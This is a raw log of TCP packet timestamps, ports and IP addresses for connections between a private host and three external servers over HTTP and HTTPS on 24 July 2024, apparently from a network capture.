Jul 24, 2024 19:56:25.490315914 CEST	80	49733	64.190.113.113	192.168.2.10
Jul 24, 2024 19:56:25.490344048 CEST	49733	80	192.168.2.10	64.190.113.113
Jul 24, 2024 19:56:25.490365982 CEST	49733	80	192.168.2.10	64.190.113.113
Jul 24, 2024 19:56:25.491410017 CEST	80	49733	64.190.113.113	192.168.2.10
Jul 24, 2024 19:56:25.491420984 CEST	80	49733	64.190.113.113	192.168.2.10
Jul 24, 2024 19:56:25.491432905 CEST	80	49733	64.190.113.113	192.168.2.10
Jul 24, 2024 19:56:25.491445065 CEST	80	49733	64.190.113.113	192.168.2.10
Jul 24, 2024 19:56:25.491456985 CEST	80	49733	64.190.113.113	192.168.2.10
Jul 24, 2024 19:56:25.491467953 CEST	80	49733	64.190.113.113	192.168.2.10
Jul 24, 2024 19:56:25.491478920 CEST	80	49733	64.190.113.113	192.168.2.10
Jul 24, 2024 19:56:25.491569996 CEST	49733	80	192.168.2.10	64.190.113.113
Jul 24, 2024 19:56:25.491569996 CEST	49733	80	192.168.2.10	64.190.113.113
Jul 24, 2024 19:56:25.492027998 CEST	80	49733	64.190.113.113	192.168.2.10
Jul 24, 2024 19:56:25.492039919 CEST	80	49733	64.190.113.113	192.168.2.10
Jul 24, 2024 19:56:25.492052078 CEST	80	49733	64.190.113.113	192.168.2.10
Jul 24, 2024 19:56:25.492063999 CEST	80	49733	64.190.113.113	192.168.2.10
Jul 24, 2024 19:56:25.492105961 CEST	49733	80	192.168.2.10	64.190.113.113
Jul 24, 2024 19:56:25.492105961 CEST	49733	80	192.168.2.10	64.190.113.113
Jul 24, 2024 19:56:25.492171049 CEST	80	49733	64.190.113.113	192.168.2.10
Jul 24, 2024 19:56:25.492213011 CEST	49733	80	192.168.2.10	64.190.113.113
Jul 24, 2024 19:56:25.492589951 CEST	80	49733	64.190.113.113	192.168.2.10
Jul 24, 2024 19:56:25.492757082 CEST	80	49733	64.190.113.113	192.168.2.10
Jul 24, 2024 19:56:25.492769957 CEST	80	49733	64.190.113.113	192.168.2.10
Jul 24, 2024 19:56:25.492780924 CEST	80	49733	64.190.113.113	192.168.2.10
Jul 24, 2024 19:56:25.492791891 CEST	80	49733	64.190.113.113	192.168.2.10
Jul 24, 2024 19:56:25.492804050 CEST	80	49733	64.190.113.113	192.168.2.10
Jul 24, 2024 19:56:25.492815971 CEST	80	49733	64.190.113.113	192.168.2.10
Jul 24, 2024 19:56:25.492826939 CEST	80	49733	64.190.113.113	192.168.2.10
Jul 24, 2024 19:56:25.492826939 CEST	49733	80	192.168.2.10	64.190.113.113
Jul 24, 2024 19:56:25.492826939 CEST	49733	80	192.168.2.10	64.190.113.113
Jul 24, 2024 19:56:25.492840052 CEST	80	49733	64.190.113.113	192.168.2.10
Jul 24, 2024 19:56:25.492851019 CEST	80	49733	64.190.113.113	192.168.2.10
Jul 24, 2024 19:56:25.492868900 CEST	49733	80	192.168.2.10	64.190.113.113
Jul 24, 2024 19:56:25.493048906 CEST	49733	80	192.168.2.10	64.190.113.113
Jul 24, 2024 19:56:25.493048906 CEST	49733	80	192.168.2.10	64.190.113.113
Jul 24, 2024 19:56:25.493665934 CEST	80	49733	64.190.113.113	192.168.2.10
Jul 24, 2024 19:56:25.493953943 CEST	80	49733	64.190.113.113	192.168.2.10
Jul 24, 2024 19:56:25.493964911 CEST	80	49733	64.190.113.113	192.168.2.10
Jul 24, 2024 19:56:25.493977070 CEST	80	49733	64.190.113.113	192.168.2.10
Jul 24, 2024 19:56:25.493988991 CEST	80	49733	64.190.113.113	192.168.2.10
Jul 24, 2024 19:56:25.493999958 CEST	80	49733	64.190.113.113	192.168.2.10
Jul 24, 2024 19:56:25.494012117 CEST	80	49733	64.190.113.113	192.168.2.10
Jul 24, 2024 19:56:25.494023085 CEST	80	49733	64.190.113.113	192.168.2.10
Jul 24, 2024 19:56:25.494025946 CEST	49733	80	192.168.2.10	64.190.113.113
Jul 24, 2024 19:56:25.494025946 CEST	49733	80	192.168.2.10	64.190.113.113
Jul 24, 2024 19:56:25.494036913 CEST	80	49733	64.190.113.113	192.168.2.10
Jul 24, 2024 19:56:25.494049072 CEST	80	49733	64.190.113.113	192.168.2.10
Jul 24, 2024 19:56:25.494080067 CEST	49733	80	192.168.2.10	64.190.113.113
Jul 24, 2024 19:56:25.494080067 CEST	49733	80	192.168.2.10	64.190.113.113
Jul 24, 2024 19:56:25.494097948 CEST	49733	80	192.168.2.10	64.190.113.113
Jul 24, 2024 19:56:25.494566917 CEST	80	49733	64.190.113.113	192.168.2.10
Jul 24, 2024 19:56:25.494580030 CEST	80	49733	64.190.113.113	192.168.2.10
Jul 24, 2024 19:56:25.494590998 CEST	80	49733	64.190.113.113	192.168.2.10
Jul 24, 2024 19:56:25.494601965 CEST	80	49733	64.190.113.113	192.168.2.10
Jul 24, 2024 19:56:25.494613886 CEST	80	49733	64.190.113.113	192.168.2.10
Jul 24, 2024 19:56:25.494626045 CEST	80	49733	64.190.113.113	192.168.2.10
Jul 24, 2024 19:56:25.494637012 CEST	80	49733	64.190.113.113	192.168.2.10
Jul 24, 2024 19:56:25.494648933 CEST	80	49733	64.190.113.113	192.168.2.10
Jul 24, 2024 19:56:25.494652033 CEST	49733	80	192.168.2.10	64.190.113.113
Jul 24, 2024 19:56:25.494652033 CEST	49733	80	192.168.2.10	64.190.113.113
Jul 24, 2024 19:56:25.494709969 CEST	49733	80	192.168.2.10	64.190.113.113
Jul 24, 2024 19:56:25.494709969 CEST	49733	80	192.168.2.10	64.190.113.113
Jul 24, 2024 19:56:25.494718075 CEST	80	49733	64.190.113.113	192.168.2.10
Jul 24, 2024 19:56:25.494729996 CEST	80	49733	64.190.113.113	192.168.2.10
Jul 24, 2024 19:56:25.494879961 CEST	49733	80	192.168.2.10	64.190.113.113
Jul 24, 2024 19:56:25.495774031 CEST	80	49733	64.190.113.113	192.168.2.10
Jul 24, 2024 19:56:25.495785952 CEST	80	49733	64.190.113.113	192.168.2.10
Jul 24, 2024 19:56:25.495832920 CEST	49733	80	192.168.2.10	64.190.113.113
Jul 24, 2024 19:56:25.571585894 CEST	80	49733	64.190.113.113	192.168.2.10
Jul 24, 2024 19:56:25.571604967 CEST	80	49733	64.190.113.113	192.168.2.10
Jul 24, 2024 19:56:25.571616888 CEST	80	49733	64.190.113.113	192.168.2.10
Jul 24, 2024 19:56:25.571626902 CEST	80	49733	64.190.113.113	192.168.2.10
Jul 24, 2024 19:56:25.571640015 CEST	80	49733	64.190.113.113	192.168.2.10
Jul 24, 2024 19:56:25.571686983 CEST	80	49733	64.190.113.113	192.168.2.10
Jul 24, 2024 19:56:25.571928978 CEST	49733	80	192.168.2.10	64.190.113.113
Jul 24, 2024 19:56:25.571996927 CEST	49733	80	192.168.2.10	64.190.113.113
Jul 24, 2024 19:56:25.572197914 CEST	80	49733	64.190.113.113	192.168.2.10
Jul 24, 2024 19:56:25.572211981 CEST	80	49733	64.190.113.113	192.168.2.10
Jul 24, 2024 19:56:25.572223902 CEST	80	49733	64.190.113.113	192.168.2.10
Jul 24, 2024 19:56:25.572230101 CEST	80	49733	64.190.113.113	192.168.2.10
Jul 24, 2024 19:56:25.572241068 CEST	80	49733	64.190.113.113	192.168.2.10
Jul 24, 2024 19:56:25.572252989 CEST	80	49733	64.190.113.113	192.168.2.10
Jul 24, 2024 19:56:25.572304010 CEST	49733	80	192.168.2.10	64.190.113.113
Jul 24, 2024 19:56:25.572506905 CEST	49733	80	192.168.2.10	64.190.113.113
Jul 24, 2024 19:56:25.573287010 CEST	80	49733	64.190.113.113	192.168.2.10
Jul 24, 2024 19:56:25.573298931 CEST	80	49733	64.190.113.113	192.168.2.10
Jul 24, 2024 19:56:25.573309898 CEST	80	49733	64.190.113.113	192.168.2.10
Jul 24, 2024 19:56:25.573371887 CEST	49733	80	192.168.2.10	64.190.113.113
Jul 24, 2024 19:56:25.573405981 CEST	80	49733	64.190.113.113	192.168.2.10
Jul 24, 2024 19:56:25.573417902 CEST	80	49733	64.190.113.113	192.168.2.10
Jul 24, 2024 19:56:25.573597908 CEST	49733	80	192.168.2.10	64.190.113.113
Jul 24, 2024 19:56:25.573908091 CEST	80	49733	64.190.113.113	192.168.2.10
Jul 24, 2024 19:56:25.573920012 CEST	80	49733	64.190.113.113	192.168.2.10
Jul 24, 2024 19:56:25.573930979 CEST	80	49733	64.190.113.113	192.168.2.10
Jul 24, 2024 19:56:25.573942900 CEST	80	49733	64.190.113.113	192.168.2.10
Jul 24, 2024 19:56:25.574021101 CEST	49733	80	192.168.2.10	64.190.113.113
Jul 24, 2024 19:56:25.574043989 CEST	80	49733	64.190.113.113	192.168.2.10
Jul 24, 2024 19:56:25.574057102 CEST	80	49733	64.190.113.113	192.168.2.10
Jul 24, 2024 19:56:25.574069023 CEST	80	49733	64.190.113.113	192.168.2.10
Jul 24, 2024 19:56:25.574156046 CEST	49733	80	192.168.2.10	64.190.113.113
Jul 24, 2024 19:56:25.575098038 CEST	80	49733	64.190.113.113	192.168.2.10
Jul 24, 2024 19:56:25.575109959 CEST	80	49733	64.190.113.113	192.168.2.10
Jul 24, 2024 19:56:25.575120926 CEST	80	49733	64.190.113.113	192.168.2.10
Jul 24, 2024 19:56:25.575126886 CEST	80	49733	64.190.113.113	192.168.2.10
Jul 24, 2024 19:56:25.575138092 CEST	80	49733	64.190.113.113	192.168.2.10
Jul 24, 2024 19:56:25.575231075 CEST	80	49733	64.190.113.113	192.168.2.10
Jul 24, 2024 19:56:25.575248003 CEST	49733	80	192.168.2.10	64.190.113.113
Jul 24, 2024 19:56:25.575248957 CEST	80	49733	64.190.113.113	192.168.2.10
Jul 24, 2024 19:56:25.575261116 CEST	80	49733	64.190.113.113	192.168.2.10
Jul 24, 2024 19:56:25.575360060 CEST	49733	80	192.168.2.10	64.190.113.113
Jul 24, 2024 19:56:25.576282978 CEST	80	49733	64.190.113.113	192.168.2.10
Jul 24, 2024 19:56:25.576297045 CEST	80	49733	64.190.113.113	192.168.2.10
Jul 24, 2024 19:56:25.576313972 CEST	80	49733	64.190.113.113	192.168.2.10
Jul 24, 2024 19:56:25.576324940 CEST	80	49733	64.190.113.113	192.168.2.10
Jul 24, 2024 19:56:25.576422930 CEST	49733	80	192.168.2.10	64.190.113.113
Jul 24, 2024 19:56:25.576426983 CEST	80	49733	64.190.113.113	192.168.2.10
Jul 24, 2024 19:56:25.576441050 CEST	80	49733	64.190.113.113	192.168.2.10
Jul 24, 2024 19:56:25.576447010 CEST	80	49733	64.190.113.113	192.168.2.10
Jul 24, 2024 19:56:25.576462030 CEST	80	49733	64.190.113.113	192.168.2.10
Jul 24, 2024 19:56:25.576502085 CEST	49733	80	192.168.2.10	64.190.113.113
Jul 24, 2024 19:56:25.576555967 CEST	49733	80	192.168.2.10	64.190.113.113
Jul 24, 2024 19:56:25.680541992 CEST	49734	80	192.168.2.10	189.165.133.52
Jul 24, 2024 19:56:25.685353041 CEST	80	49734	189.165.133.52	192.168.2.10
Jul 24, 2024 19:56:25.685445070 CEST	49734	80	192.168.2.10	189.165.133.52
Jul 24, 2024 19:56:25.685601950 CEST	49734	80	192.168.2.10	189.165.133.52
Jul 24, 2024 19:56:25.685638905 CEST	49734	80	192.168.2.10	189.165.133.52
Jul 24, 2024 19:56:25.690696001 CEST	80	49734	189.165.133.52	192.168.2.10
Jul 24, 2024 19:56:25.690738916 CEST	80	49734	189.165.133.52	192.168.2.10
Jul 24, 2024 19:56:26.858165026 CEST	80	49734	189.165.133.52	192.168.2.10
Jul 24, 2024 19:56:26.863960028 CEST	80	49734	189.165.133.52	192.168.2.10
Jul 24, 2024 19:56:26.864044905 CEST	49734	80	192.168.2.10	189.165.133.52
Jul 24, 2024 19:56:26.864105940 CEST	49734	80	192.168.2.10	189.165.133.52
Jul 24, 2024 19:56:26.866976976 CEST	49735	80	192.168.2.10	189.165.133.52
Jul 24, 2024 19:56:26.869313002 CEST	80	49734	189.165.133.52	192.168.2.10
Jul 24, 2024 19:56:26.872065067 CEST	80	49735	189.165.133.52	192.168.2.10
Jul 24, 2024 19:56:26.872153044 CEST	49735	80	192.168.2.10	189.165.133.52
Jul 24, 2024 19:56:26.872417927 CEST	49735	80	192.168.2.10	189.165.133.52
Jul 24, 2024 19:56:26.872442007 CEST	49735	80	192.168.2.10	189.165.133.52
Jul 24, 2024 19:56:26.877312899 CEST	80	49735	189.165.133.52	192.168.2.10
Jul 24, 2024 19:56:26.877386093 CEST	80	49735	189.165.133.52	192.168.2.10
Jul 24, 2024 19:56:27.937855959 CEST	80	49735	189.165.133.52	192.168.2.10
Jul 24, 2024 19:56:27.938757896 CEST	80	49735	189.165.133.52	192.168.2.10
Jul 24, 2024 19:56:27.939047098 CEST	49735	80	192.168.2.10	189.165.133.52
Jul 24, 2024 19:56:27.939047098 CEST	49735	80	192.168.2.10	189.165.133.52
Jul 24, 2024 19:56:27.943995953 CEST	80	49735	189.165.133.52	192.168.2.10
Jul 24, 2024 19:56:27.945799112 CEST	49736	80	192.168.2.10	189.165.133.52
Jul 24, 2024 19:56:27.950851917 CEST	80	49736	189.165.133.52	192.168.2.10
Jul 24, 2024 19:56:27.951097012 CEST	49736	80	192.168.2.10	189.165.133.52
Jul 24, 2024 19:56:27.951421976 CEST	49736	80	192.168.2.10	189.165.133.52
Jul 24, 2024 19:56:27.951631069 CEST	49736	80	192.168.2.10	189.165.133.52
Jul 24, 2024 19:56:27.956216097 CEST	80	49736	189.165.133.52	192.168.2.10
Jul 24, 2024 19:56:27.956398010 CEST	80	49736	189.165.133.52	192.168.2.10
Jul 24, 2024 19:56:29.005528927 CEST	80	49736	189.165.133.52	192.168.2.10
Jul 24, 2024 19:56:29.006297112 CEST	80	49736	189.165.133.52	192.168.2.10
Jul 24, 2024 19:56:29.006378889 CEST	49736	80	192.168.2.10	189.165.133.52
Jul 24, 2024 19:56:29.006398916 CEST	49736	80	192.168.2.10	189.165.133.52
Jul 24, 2024 19:56:29.011542082 CEST	80	49736	189.165.133.52	192.168.2.10
Jul 24, 2024 19:56:29.072166920 CEST	49737	443	192.168.2.10	185.149.100.242
Jul 24, 2024 19:56:29.072210073 CEST	443	49737	185.149.100.242	192.168.2.10
Jul 24, 2024 19:56:29.072273016 CEST	49737	443	192.168.2.10	185.149.100.242
Jul 24, 2024 19:56:29.072810888 CEST	49737	443	192.168.2.10	185.149.100.242
Jul 24, 2024 19:56:29.072824001 CEST	443	49737	185.149.100.242	192.168.2.10
Jul 24, 2024 19:56:29.847351074 CEST	443	49737	185.149.100.242	192.168.2.10
Jul 24, 2024 19:56:29.847434044 CEST	49737	443	192.168.2.10	185.149.100.242
Jul 24, 2024 19:56:29.849879980 CEST	49737	443	192.168.2.10	185.149.100.242
Jul 24, 2024 19:56:29.849889040 CEST	443	49737	185.149.100.242	192.168.2.10
Jul 24, 2024 19:56:29.850148916 CEST	443	49737	185.149.100.242	192.168.2.10
Jul 24, 2024 19:56:29.884885073 CEST	49737	443	192.168.2.10	185.149.100.242
Jul 24, 2024 19:56:29.932497025 CEST	443	49737	185.149.100.242	192.168.2.10
Jul 24, 2024 19:56:29.948734999 CEST	80	49733	64.190.113.113	192.168.2.10
Jul 24, 2024 19:56:29.948985100 CEST	49733	80	192.168.2.10	64.190.113.113
Jul 24, 2024 19:56:29.948985100 CEST	49733	80	192.168.2.10	64.190.113.113
Jul 24, 2024 19:56:29.954046011 CEST	80	49733	64.190.113.113	192.168.2.10
Jul 24, 2024 19:56:30.258656979 CEST	443	49737	185.149.100.242	192.168.2.10
Jul 24, 2024 19:56:30.309432030 CEST	49737	443	192.168.2.10	185.149.100.242
Jul 24, 2024 19:56:30.837841988 CEST	443	49737	185.149.100.242	192.168.2.10
Jul 24, 2024 19:56:30.837852001 CEST	443	49737	185.149.100.242	192.168.2.10
Jul 24, 2024 19:56:30.837882996 CEST	443	49737	185.149.100.242	192.168.2.10
Jul 24, 2024 19:56:30.837894917 CEST	443	49737	185.149.100.242	192.168.2.10
Jul 24, 2024 19:56:30.837914944 CEST	443	49737	185.149.100.242	192.168.2.10
Jul 24, 2024 19:56:30.837969065 CEST	49737	443	192.168.2.10	185.149.100.242
Jul 24, 2024 19:56:30.838006020 CEST	443	49737	185.149.100.242	192.168.2.10
Jul 24, 2024 19:56:30.838025093 CEST	49737	443	192.168.2.10	185.149.100.242
Jul 24, 2024 19:56:30.838062048 CEST	49737	443	192.168.2.10	185.149.100.242
Jul 24, 2024 19:56:30.839560032 CEST	443	49737	185.149.100.242	192.168.2.10
Jul 24, 2024 19:56:30.839580059 CEST	443	49737	185.149.100.242	192.168.2.10
Jul 24, 2024 19:56:30.839648962 CEST	49737	443	192.168.2.10	185.149.100.242
Jul 24, 2024 19:56:30.839657068 CEST	443	49737	185.149.100.242	192.168.2.10
Jul 24, 2024 19:56:30.839704990 CEST	49737	443	192.168.2.10	185.149.100.242
Jul 24, 2024 19:56:30.843576908 CEST	443	49737	185.149.100.242	192.168.2.10
Jul 24, 2024 19:56:30.843595982 CEST	443	49737	185.149.100.242	192.168.2.10
Jul 24, 2024 19:56:30.843662977 CEST	49737	443	192.168.2.10	185.149.100.242
Jul 24, 2024 19:56:30.843672037 CEST	443	49737	185.149.100.242	192.168.2.10
Jul 24, 2024 19:56:30.843729019 CEST	49737	443	192.168.2.10	185.149.100.242
Jul 24, 2024 19:56:30.845787048 CEST	443	49737	185.149.100.242	192.168.2.10
Jul 24, 2024 19:56:30.845805883 CEST	443	49737	185.149.100.242	192.168.2.10
Jul 24, 2024 19:56:30.845885038 CEST	49737	443	192.168.2.10	185.149.100.242
Jul 24, 2024 19:56:30.845894098 CEST	443	49737	185.149.100.242	192.168.2.10
Jul 24, 2024 19:56:30.845938921 CEST	49737	443	192.168.2.10	185.149.100.242
Jul 24, 2024 19:56:30.849355936 CEST	443	49737	185.149.100.242	192.168.2.10
Jul 24, 2024 19:56:30.849375963 CEST	443	49737	185.149.100.242	192.168.2.10
Jul 24, 2024 19:56:30.849436998 CEST	49737	443	192.168.2.10	185.149.100.242
Jul 24, 2024 19:56:30.849445105 CEST	443	49737	185.149.100.242	192.168.2.10
Jul 24, 2024 19:56:30.849487066 CEST	49737	443	192.168.2.10	185.149.100.242
Jul 24, 2024 19:56:30.851046085 CEST	443	49737	185.149.100.242	192.168.2.10
Jul 24, 2024 19:56:30.851062059 CEST	443	49737	185.149.100.242	192.168.2.10
Jul 24, 2024 19:56:30.851247072 CEST	49737	443	192.168.2.10	185.149.100.242
Jul 24, 2024 19:56:30.851254940 CEST	443	49737	185.149.100.242	192.168.2.10
Jul 24, 2024 19:56:30.851300955 CEST	49737	443	192.168.2.10	185.149.100.242
Jul 24, 2024 19:56:30.853168964 CEST	443	49737	185.149.100.242	192.168.2.10
Jul 24, 2024 19:56:30.853183985 CEST	443	49737	185.149.100.242	192.168.2.10
Jul 24, 2024 19:56:30.853251934 CEST	49737	443	192.168.2.10	185.149.100.242
Jul 24, 2024 19:56:30.853260040 CEST	443	49737	185.149.100.242	192.168.2.10
Jul 24, 2024 19:56:30.853303909 CEST	49737	443	192.168.2.10	185.149.100.242
Jul 24, 2024 19:56:30.858772993 CEST	443	49737	185.149.100.242	192.168.2.10
Jul 24, 2024 19:56:30.858789921 CEST	443	49737	185.149.100.242	192.168.2.10
Jul 24, 2024 19:56:30.858845949 CEST	49737	443	192.168.2.10	185.149.100.242
Jul 24, 2024 19:56:30.858856916 CEST	443	49737	185.149.100.242	192.168.2.10
Jul 24, 2024 19:56:30.858899117 CEST	49737	443	192.168.2.10	185.149.100.242
Jul 24, 2024 19:56:30.859245062 CEST	443	49737	185.149.100.242	192.168.2.10
Jul 24, 2024 19:56:30.859260082 CEST	443	49737	185.149.100.242	192.168.2.10
Jul 24, 2024 19:56:30.859304905 CEST	49737	443	192.168.2.10	185.149.100.242
Jul 24, 2024 19:56:30.859311104 CEST	443	49737	185.149.100.242	192.168.2.10
Jul 24, 2024 19:56:30.859340906 CEST	49737	443	192.168.2.10	185.149.100.242
Jul 24, 2024 19:56:30.859357119 CEST	49737	443	192.168.2.10	185.149.100.242
Jul 24, 2024 19:56:30.859947920 CEST	443	49737	185.149.100.242	192.168.2.10
Jul 24, 2024 19:56:30.859966040 CEST	443	49737	185.149.100.242	192.168.2.10
Jul 24, 2024 19:56:30.860048056 CEST	49737	443	192.168.2.10	185.149.100.242
Jul 24, 2024 19:56:30.860054970 CEST	443	49737	185.149.100.242	192.168.2.10
Jul 24, 2024 19:56:30.860121965 CEST	49737	443	192.168.2.10	185.149.100.242
Jul 24, 2024 19:56:30.861506939 CEST	443	49737	185.149.100.242	192.168.2.10
Jul 24, 2024 19:56:30.861522913 CEST	443	49737	185.149.100.242	192.168.2.10
Jul 24, 2024 19:56:30.861605883 CEST	49737	443	192.168.2.10	185.149.100.242
Jul 24, 2024 19:56:30.861613035 CEST	443	49737	185.149.100.242	192.168.2.10
Jul 24, 2024 19:56:30.861670971 CEST	49737	443	192.168.2.10	185.149.100.242
Jul 24, 2024 19:56:30.863084078 CEST	443	49737	185.149.100.242	192.168.2.10
Jul 24, 2024 19:56:30.863100052 CEST	443	49737	185.149.100.242	192.168.2.10
Jul 24, 2024 19:56:30.863188028 CEST	49737	443	192.168.2.10	185.149.100.242
Jul 24, 2024 19:56:30.863194942 CEST	443	49737	185.149.100.242	192.168.2.10
Jul 24, 2024 19:56:30.863262892 CEST	49737	443	192.168.2.10	185.149.100.242
Jul 24, 2024 19:56:30.864439011 CEST	443	49737	185.149.100.242	192.168.2.10
Jul 24, 2024 19:56:30.864454031 CEST	443	49737	185.149.100.242	192.168.2.10
Jul 24, 2024 19:56:30.864542007 CEST	49737	443	192.168.2.10	185.149.100.242
Jul 24, 2024 19:56:30.864548922 CEST	443	49737	185.149.100.242	192.168.2.10
Jul 24, 2024 19:56:30.864605904 CEST	49737	443	192.168.2.10	185.149.100.242
Jul 24, 2024 19:56:30.867109060 CEST	443	49737	185.149.100.242	192.168.2.10
Jul 24, 2024 19:56:30.867125034 CEST	443	49737	185.149.100.242	192.168.2.10
Jul 24, 2024 19:56:30.867213964 CEST	49737	443	192.168.2.10	185.149.100.242
Jul 24, 2024 19:56:30.867222071 CEST	443	49737	185.149.100.242	192.168.2.10
Jul 24, 2024 19:56:30.867286921 CEST	49737	443	192.168.2.10	185.149.100.242
Jul 24, 2024 19:56:30.868530989 CEST	443	49737	185.149.100.242	192.168.2.10
Jul 24, 2024 19:56:30.868546963 CEST	443	49737	185.149.100.242	192.168.2.10
Jul 24, 2024 19:56:30.868637085 CEST	49737	443	192.168.2.10	185.149.100.242
Jul 24, 2024 19:56:30.868647099 CEST	443	49737	185.149.100.242	192.168.2.10
Jul 24, 2024 19:56:30.868709087 CEST	49737	443	192.168.2.10	185.149.100.242
Jul 24, 2024 19:56:30.870233059 CEST	443	49737	185.149.100.242	192.168.2.10
Jul 24, 2024 19:56:30.870255947 CEST	443	49737	185.149.100.242	192.168.2.10
Jul 24, 2024 19:56:30.870356083 CEST	49737	443	192.168.2.10	185.149.100.242
Jul 24, 2024 19:56:30.870363951 CEST	443	49737	185.149.100.242	192.168.2.10
Jul 24, 2024 19:56:30.870438099 CEST	49737	443	192.168.2.10	185.149.100.242
Jul 24, 2024 19:56:30.871912956 CEST	443	49737	185.149.100.242	192.168.2.10
Jul 24, 2024 19:56:30.871927977 CEST	443	49737	185.149.100.242	192.168.2.10
Jul 24, 2024 19:56:30.872028112 CEST	49737	443	192.168.2.10	185.149.100.242
Jul 24, 2024 19:56:30.872035980 CEST	443	49737	185.149.100.242	192.168.2.10
Jul 24, 2024 19:56:30.872126102 CEST	49737	443	192.168.2.10	185.149.100.242
Jul 24, 2024 19:56:30.872837067 CEST	443	49737	185.149.100.242	192.168.2.10
Jul 24, 2024 19:56:30.872853041 CEST	443	49737	185.149.100.242	192.168.2.10
Jul 24, 2024 19:56:30.872951031 CEST	49737	443	192.168.2.10	185.149.100.242
Jul 24, 2024 19:56:30.872960091 CEST	443	49737	185.149.100.242	192.168.2.10
Jul 24, 2024 19:56:30.873053074 CEST	49737	443	192.168.2.10	185.149.100.242
Jul 24, 2024 19:56:30.874466896 CEST	443	49737	185.149.100.242	192.168.2.10
Jul 24, 2024 19:56:30.874481916 CEST	443	49737	185.149.100.242	192.168.2.10
Jul 24, 2024 19:56:30.874663115 CEST	49737	443	192.168.2.10	185.149.100.242
Jul 24, 2024 19:56:30.874670982 CEST	443	49737	185.149.100.242	192.168.2.10
Jul 24, 2024 19:56:30.874754906 CEST	49737	443	192.168.2.10	185.149.100.242
Jul 24, 2024 19:56:30.875663042 CEST	443	49737	185.149.100.242	192.168.2.10
Jul 24, 2024 19:56:30.875680923 CEST	443	49737	185.149.100.242	192.168.2.10
Jul 24, 2024 19:56:30.875822067 CEST	49737	443	192.168.2.10	185.149.100.242
Jul 24, 2024 19:56:30.875830889 CEST	443	49737	185.149.100.242	192.168.2.10
Jul 24, 2024 19:56:30.875921011 CEST	49737	443	192.168.2.10	185.149.100.242
Jul 24, 2024 19:56:30.876599073 CEST	443	49737	185.149.100.242	192.168.2.10
Jul 24, 2024 19:56:30.876615047 CEST	443	49737	185.149.100.242	192.168.2.10
Jul 24, 2024 19:56:30.876739979 CEST	49737	443	192.168.2.10	185.149.100.242
Jul 24, 2024 19:56:30.876748085 CEST	443	49737	185.149.100.242	192.168.2.10
Jul 24, 2024 19:56:30.876832008 CEST	49737	443	192.168.2.10	185.149.100.242
Jul 24, 2024 19:56:30.882246017 CEST	49737	443	192.168.2.10	185.149.100.242
Jul 24, 2024 19:56:30.943777084 CEST	443	49737	185.149.100.242	192.168.2.10
Jul 24, 2024 19:56:30.943799019 CEST	443	49737	185.149.100.242	192.168.2.10
Jul 24, 2024 19:56:30.943886042 CEST	49737	443	192.168.2.10	185.149.100.242
Jul 24, 2024 19:56:30.943902969 CEST	443	49737	185.149.100.242	192.168.2.10
Jul 24, 2024 19:56:30.943938971 CEST	49737	443	192.168.2.10	185.149.100.242
Jul 24, 2024 19:56:30.944658995 CEST	443	49737	185.149.100.242	192.168.2.10
Jul 24, 2024 19:56:30.944674969 CEST	443	49737	185.149.100.242	192.168.2.10
Jul 24, 2024 19:56:30.944734097 CEST	49737	443	192.168.2.10	185.149.100.242
Jul 24, 2024 19:56:30.944741964 CEST	443	49737	185.149.100.242	192.168.2.10
Jul 24, 2024 19:56:30.944782019 CEST	49737	443	192.168.2.10	185.149.100.242
Jul 24, 2024 19:56:30.946336031 CEST	443	49737	185.149.100.242	192.168.2.10
Jul 24, 2024 19:56:30.946353912 CEST	443	49737	185.149.100.242	192.168.2.10
Jul 24, 2024 19:56:30.946408033 CEST	49737	443	192.168.2.10	185.149.100.242
Jul 24, 2024 19:56:30.946415901 CEST	443	49737	185.149.100.242	192.168.2.10
Jul 24, 2024 19:56:30.946459055 CEST	49737	443	192.168.2.10	185.149.100.242
Jul 24, 2024 19:56:30.948218107 CEST	443	49737	185.149.100.242	192.168.2.10
Jul 24, 2024 19:56:30.948232889 CEST	443	49737	185.149.100.242	192.168.2.10
Jul 24, 2024 19:56:30.948281050 CEST	49737	443	192.168.2.10	185.149.100.242
Jul 24, 2024 19:56:30.948287964 CEST	443	49737	185.149.100.242	192.168.2.10
Jul 24, 2024 19:56:30.948316097 CEST	49737	443	192.168.2.10	185.149.100.242
Jul 24, 2024 19:56:30.948333025 CEST	49737	443	192.168.2.10	185.149.100.242
Jul 24, 2024 19:56:30.948728085 CEST	443	49737	185.149.100.242	192.168.2.10
Jul 24, 2024 19:56:30.948744059 CEST	443	49737	185.149.100.242	192.168.2.10
Jul 24, 2024 19:56:30.948822021 CEST	49737	443	192.168.2.10	185.149.100.242
Jul 24, 2024 19:56:30.948831081 CEST	443	49737	185.149.100.242	192.168.2.10
Jul 24, 2024 19:56:30.948870897 CEST	49737	443	192.168.2.10	185.149.100.242
Jul 24, 2024 19:56:30.950687885 CEST	443	49737	185.149.100.242	192.168.2.10
Jul 24, 2024 19:56:30.950704098 CEST	443	49737	185.149.100.242	192.168.2.10
Jul 24, 2024 19:56:30.950771093 CEST	49737	443	192.168.2.10	185.149.100.242
Jul 24, 2024 19:56:30.950779915 CEST	443	49737	185.149.100.242	192.168.2.10
Jul 24, 2024 19:56:30.950824022 CEST	49737	443	192.168.2.10	185.149.100.242
Jul 24, 2024 19:56:30.990714073 CEST	443	49737	185.149.100.242	192.168.2.10
Jul 24, 2024 19:56:30.990731955 CEST	443	49737	185.149.100.242	192.168.2.10
Jul 24, 2024 19:56:30.990803003 CEST	49737	443	192.168.2.10	185.149.100.242
Jul 24, 2024 19:56:30.990825891 CEST	443	49737	185.149.100.242	192.168.2.10
Jul 24, 2024 19:56:30.990871906 CEST	49737	443	192.168.2.10	185.149.100.242
Jul 24, 2024 19:56:30.992044926 CEST	443	49737	185.149.100.242	192.168.2.10
Jul 24, 2024 19:56:30.992062092 CEST	443	49737	185.149.100.242	192.168.2.10
Jul 24, 2024 19:56:30.992104053 CEST	49737	443	192.168.2.10	185.149.100.242
Jul 24, 2024 19:56:30.992110968 CEST	443	49737	185.149.100.242	192.168.2.10
Jul 24, 2024 19:56:30.992142916 CEST	49737	443	192.168.2.10	185.149.100.242
Jul 24, 2024 19:56:30.992158890 CEST	49737	443	192.168.2.10	185.149.100.242
Jul 24, 2024 19:56:31.030829906 CEST	443	49737	185.149.100.242	192.168.2.10
Jul 24, 2024 19:56:31.030850887 CEST	443	49737	185.149.100.242	192.168.2.10
Jul 24, 2024 19:56:31.031047106 CEST	49737	443	192.168.2.10	185.149.100.242
Jul 24, 2024 19:56:31.031083107 CEST	443	49737	185.149.100.242	192.168.2.10
Jul 24, 2024 19:56:31.031131983 CEST	49737	443	192.168.2.10	185.149.100.242
